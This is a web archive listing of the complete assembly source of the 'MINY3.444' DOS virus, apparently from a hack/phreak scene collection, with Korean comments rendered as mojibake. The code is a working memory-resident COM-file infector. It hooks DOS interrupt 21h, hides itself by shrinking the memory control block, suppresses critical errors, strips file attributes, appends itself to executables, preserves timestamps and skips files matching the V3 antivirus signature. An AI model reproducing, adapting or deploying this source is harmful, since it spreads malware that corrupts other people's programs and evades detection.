home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-444.ASM < prev    next >
Assembly Source File  |  1995-06-01  |  10KB  |  297 lines
  1. ;******************************************************************************
  2. ;*                                                                            *
  3. ;*        MINY3.444   Virus                                                   *
  4. ;*                                                                            *
  5. ;*     444 ñß╕σ╖ÑòA êq╡q¡óòíêa ¿i£a╣vöa. »⌐╨ù¬à┤aôí£a ╠a╖⌐ ╡í╧eùw╡Aòí êq╡q╖í  *
  6. ;*     ûEöa. ╨a╗íáe, ╡b»í COMMAND.COM ╡A êq╡q╖í ûA┤߼ߠªü╦╖╖í ┤eûI«ü ╖╢öa.    *
  7. ;*                                                                            *
  8. ;******************************************************************************
  9.  
  10.  PARASIZE      EQU     (TVirEND - Start + 0Fh) SHR 4 ; £æ╡A¼ß └a╗í╨aôe ╟aïí
  11.  
  12.  
  13.  VIRUS    SEGMENT PARA 'VIRUS'
  14.           ASSUME CS:VIRUS, DS:VIRUS
  15.  
  16.  Start:
  17.           mov     BP,100h                    ; BP=ña╖í£ß»a »í╕b ║ü¡íêt
  18.           NOP
  19.           JMP     ChkVirinMEM                ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
  20.           NOP
  21.           DB      'SVS!'                     ; ña╖í£ß»a ╣A╕b╕a
  22.  
  23.  NewInt21:                                   ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
  24.           Pushf
  25.           xchg   ah,al                       ; AH êt╖í AL ╡A ùi┤ßêeöa.
  26.           cmp    al,4Bh                      ; »⌐╨ù?
  27.           jz     Push_All                    ; ╠a╖⌐ êq╡q ╤í┬ë
  28.           cmp    al,3Dh                      ; ╡í╧e?
  29.           jz     Push_All
  30.           cmp    al,43h                      ; ¡ó¼≈?
  31.           jz     Push_All
  32.           cmp    al,56h                      ; ╠a╖⌐ ╖íƒq ñaÄüïí (REN ┤aô▒)
  33.           jz     Push_All
  34.           cmp    al,6ch                      ; ╤┬╕w ╡í╧e
  35.           jz     Push_All
  36.           cmp    AX,034F0h                   ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
  37.           jnz    J_Int21
  38.           Popf
  39.           xor    ax,ax                       ; áx╖aíe 0000╖i ò⌐¥a║æ
  40.           IRET
  41.  
  42.  J_Int21:                                    ; ╢Ñ£ü int 21¥í ╕±╧a
  43.           xchg    ah,al
  44.           PopF
  45.           DB      0EAh
  46.  OldInt21 DD      ?
  47.           DB      '/Korea'                   ; èé¼e ña╖í£ß»a╖▒.
  48.  
  49.  callInt21:                                  ; Int 21h ╤í┬ë(Int 21h╨aíe ña╖í£ß»a
  50.           xchg    ah,al                      ; êa Int 21 ╨aëí ┬ùò⌐╨q)
  51.           PushF
  52.           call    dword ptr CS:OldInt21
  53.           RET
  54.  
  55.  Push_All:
  56.           Push    AX                         ; ¥A╗í»a╚ß ╕ß╕w
  57.           Push    BX
  58.           Push    CX
  59.           Push    DX
  60.           Push    DS
  61.           Push    ES
  62.           Push    SI
  63.           Push    DI
  64.  
  65.           cmp     al,6ch                     ; ¼ü¥í╢à ╡í╧e ñw»ó╖Ñêa?
  66.           jnz     ChkEXTisCOM
  67.           cmp     dl,01                      ; ╡í╧e ñw»ó ê±¼a
  68.           jnz     JumpExit
  69.           mov     dx,si                      ; 6Ch ôe SI ╡A ╠a╖⌐╖íƒq ╢ß├íêa ùi┤ß
  70.  ChkEXTisCOM:                                ; êeöa.
  71.           mov     si,dx                      ;
  72.  Loop_Zero:
  73.           lodsb
  74.           cmp     al,00                      ; ╠a╖⌐ ╖íƒq Å{╖Ñêa?
  75.           jz      JumpExit
  76.           cmp     al,'.'                     ; ╤┬╕w╕a èüÑi╖Ñêa?
  77.           jnz     Loop_Zero
  78.           lodsw
  79.           and     ax,0DFDFh                  ; öüóà╕a¥í áeùiïí
  80.           cmp     ax,'OC'                    ; COm
  81.           jnz     JumpExit
  82.           lodsb
  83.           and     al,0DFh
  84.           cmp     al,'M'                     ; coM
  85.           jz      SetInt24h                  ; ╤┬╕w╕aêa COM ╖ííe êq╡q
  86.  JumpExit:
  87.           Jmp     Pop_all
  88.  
  89.  SetInt24h:
  90.           mov     bx,ds                      ; Int 24h ƒi êa¥í└àöa.
  91.           xor     ax,ax
  92.           mov     ds,ax
  93.           Push    DS:[0090h]
  94.           Push    DS:[0092h]
  95.           mov     word ptr DS:[0090h],offset NewInt24
  96.           mov     word ptr DS:[0092h],cs
  97.  
  98.           mov     ds,bx                      ; ¡ó¼≈ ┤Φïí
  99.           mov     ax,0043h
  100.           call    callInt21
  101.           Push    CX                         ; CX=¡ó¼≈
  102.           Push    DX                         ; DS:DX = ╠a╖⌐ ╖íƒq ╢ß├í
  103.           Push    DS
  104.  
  105.           MOV     AX,0143h                   ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
  106.           xor     cx,cx
  107.           call    callInt21
  108.           jnc     Open_File
  109.           JMP     Restore_old
  110.  Open_File:
  111.           mov     ax,023dh                   ; ╠a╖⌐ ╡í╧e ╨aïí
  112.           call    callInt21
  113.           jc      Restore_Old
  114.  
  115.           push    cs                         ; cs=ds=es
  116.           pop     ds
  117.           Push    cs
  118.           pop     es
  119.           xchg    bx,ax                      ; ╨àùi ┤Φïí
  120.  
  121.  Read_File:
  122.           mov     ah,3Fh                     ; ╖¬┤ß ùi╖íïí
  123.           mov     dx,offset Org4bytes
  124.           mov     si,dx
  125.           mov     cx,0004h
  126.           int     21h
  127.  
  128.  ChkEXEFile:
  129.           cmp     byte ptr [SI],'M'          ; EXE ╠a╖⌐ ╖Ñêa?
  130.           jz      Close_File
  131.  
  132.  ChkFSize:
  133.           cmp     byte ptr [SI+3],34h        ; êq╡q ╡aªü ╤┬╖Ñ
  134.           jz      Close_File
  135.  
  136.           mov     di,offset V3_Str           ; V3 ╠a╖⌐╖Ñ╗í ê±¼a
  137.           mov     cx,0004
  138.           repz    cmpsb
  139.           jz      Close_file
  140.  
  141.           mov     al,02h                     ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
  142.           call    Set_Pnt
  143.  
  144.           cmp     ax,1234                    ; 1234 Ñíöa ╕b╖eêa?
  145.           jb      Close_File
  146.           cmp     ax,65000                   ; 65000 Ñíöa ╟eêa?
  147.           ja      Close_File
  148.  
  149.           Push    AX
  150.           add     AX,0100h
  151.           mov     word ptr Start+1,ax        ; ña╖í£ß»a »í╕b╢ß├í
  152.           Pop     AX
  153.           sub     ax,0003                    ; JMP íw¥w ╣í╕b
  154.           mov     word ptr FileHead+1,ax
  155.           mov     byte ptr FileHead+3,34h
  156.  
  157.           mov     ax,5700h                   ; ╠a╖⌐ Éi╝a/»íêe ┤Φïí
  158.           Push    AX
  159.           Int     21h
  160.           Push    CX
  161.           Push    DX
  162.  
  163.           mov     ah,40h                     ; ña╖í£ß»a │aïí
  164.           xor     dx,dx
  165.           mov     cx, offset VirEND
  166.           Int     21h
  167.  
  168.           mov     al,00h                     ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
  169.           call    Set_Pnt
  170.  
  171.           mov     ah,40h                     ; ña╖í£ß»a │aïí
  172.           mov     dx, offset FileHead
  173.           mov     cx,0004h
  174.           Int     21h
  175.  
  176.           Pop     dx
  177.           Pop     CX
  178.           Pop     AX
  179.           Inc     AL                         ; AX=5701h
  180.           Int     21h                        ; ╢Ñ£ü Éi╝a ¥í Ñóèü
  181.  
  182.  Close_File:                                 ; ╠a╖⌐ öhïí
  183.           mov     ah,3eh
  184.           Int     21h
  185.  
  186.  Restore_Old:
  187.           Pop     DS                         ; ¡ó¼≈ Ñóèü
  188.           Pop     DX
  189.           pop     CX
  190.           mov     ax,0143h
  191.           Call    callInt21
  192.  
  193.           xor     ax,ax                      ; ╢Ñ£ü Int 24h Ñóèü
  194.           mov     ds,ax
  195.           POP     DS:[0092h]
  196.           POP     DS:[0090h]
  197.  
  198.  Pop_All:
  199.           Pop     DI
  200.           Pop     si
  201.           Pop     ES
  202.           Pop     ds
  203.           Pop     dx
  204.           Pop     cx
  205.           Pop     bx
  206.           Pop     ax
  207.           Jmp     J_Int21
  208.  
  209. ;********************************************
  210. ;    £æ¼w║ü ªüªà
  211. ;
  212.  
  213.  ChkVirinMEM:
  214.           mov     AH,34h                     ; AX=F034h/Int 21h»í
  215.           mov     AL,0F0h                    ; AX=0 ╖ííe £æ╡A ña╖í£ß»a ╖╢╖q
  216.           xchg    ah,al
  217.           Int     21h                        ;
  218.           or      ax,ax                      ;
  219.           jz      Restart_COM                ;
  220.  
  221.           xor     bx,bx                      ; BX=0000
  222.           mov     ds,bx                      ; 0000:0084h Ñó¼a
  223.           mov     si,0083h
  224.           lea     DI,SS:[BP+OldInt21]
  225.           Inc     SI
  226.           cld
  227.           movsw                              ; 0000:0084 ->
  228.  
  229.           Push    cs                         ; CS=AX
  230.           Pop     AX
  231.           movsw                              ; 0000:0086 ->
  232.           Push    cs                         ; CS=DS
  233.           Pop     ds
  234.  
  235.           mov     CX, PARASIZE               ; £æ ║ë╖⌐ ╟aïí
  236.           dec     ax
  237.           mov     ds,ax
  238.           Inc     BL                         ; BX=0001
  239.           cmp     byte ptr DS:[BX-1],'Z'     ;
  240.           jnz     Restart_COM
  241.  
  242.           sub     word ptr [BX+02],CX        ;
  243.           sub     word ptr [BX+11h],CX       ;
  244.           mov     ES,word ptr [BX+11h]       ;
  245.  
  246.           Push    cs                         ; ña╖í£ß»a ┬A¼w╢ߥí Ñó¼a
  247.           Pop     ds
  248.           mov     si,BP
  249.           xor     di,di
  250.           mov     cx, offset TVirEND
  251.           repz    movsb
  252.  
  253.           mov     ds,cx                      ; Int 21h ƒi └a╗í╨eöa.
  254.           cli
  255.           mov     word ptr [BX+85h],es
  256.           mov     word ptr [BX+83h],offset NewInt21
  257.           sti
  258.  
  259.  Restart_COM:
  260.           mov     si,BP
  261.  
  262.           push    cs
  263.           pop     ds
  264.           push    cs                         ; ds=es
  265.           pop     es
  266.  
  267.           add     si,offset Org4bytes        ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
  268.           mov     di,00FFh
  269.           Inc     di                         ; └ß╖q╖ü 4 ña╖í╦a Ñóèü
  270.           push    di
  271.           movsw
  272.           movsw
  273.           RET
  274.  
  275.  Org4bytes        db 90h,90h,0cdh,20h         ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
  276.  
  277.  Set_Pnt:
  278.           mov     ah,42h
  279.           xor     cx,cx
  280.           xor     dx,dx
  281.           Int     21h
  282.           RET
  283.  
  284.  NewInt24:                                   ; ╡A£ßêa Éa╗í ┤gëA╨eöa.
  285.           xor     al,al
  286.           IRET
  287.  
  288.           DB      '[Miny3]'                  ; ña╖í£ß»a ╖íƒq
  289.  V3_Str   DB      0EBh,13h,73h,43h           ; V3 »óÑi óà╕a╡i
  290.  FileHead DB      0E9h                       ; Long jump
  291.  VirEND:
  292.           DB      ?,?,?
  293.  TVirEND:
  294.  
  295.  VIRUS    ENDS
  296.           end     Start
  297.